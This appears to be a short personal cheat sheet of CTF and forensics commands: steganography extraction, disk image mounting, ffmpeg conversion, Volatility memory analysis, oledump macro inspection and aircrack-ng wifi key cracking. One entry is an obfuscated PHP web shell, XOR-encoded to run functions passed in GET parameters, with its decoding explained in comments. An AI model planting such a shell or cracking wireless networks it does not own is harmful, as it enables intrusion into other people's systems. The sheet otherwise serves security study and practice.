======
steghide -extract -p <password> -sf <file>
qemu-system-i386 floppy.img; vncviewer 127.0.0.1
<?=$_='$<>/'^'{{{{';${$_}[_](${$_}[__]);
// $_= '$<>/' ^ '{{{{' ----> $_ = '_GET'
// ${_GET}[_](${_GET})[__];
// final <?=$_GET[_]($_GET[__])
fdisk -l disk.img
mount -v -o offset=135266304 -t ext4 pi.img /mnt (where offset is equal to sector size * start)
cat VTS0**VOB | ffmpeg -i - -vcodec h264 -acodec mp2 rip.mp4
ffmpeg -i movie.mpg -c:v libx264 -b:v 1.5M -c:a ac3 -b:a 128k movie_comp.mpg
volatility -f OL4.raw kdbgscan
volatility -f OL4.raw pslist --profile=Win2012x64
volatility -f OL4.raw --profile=Win2012x64 envars
echo 0 | sudo tee /proc/sys/net/ipv4/ip_unprivileged_port_start
oledump file.docm
oledump file.docm -s 4 -d
aircrack-ng data.cap (WEP may be cracked with a sufficiently high number of handshakes , > ~1000)
aircrack-ng -w wordlist.txt data.pcap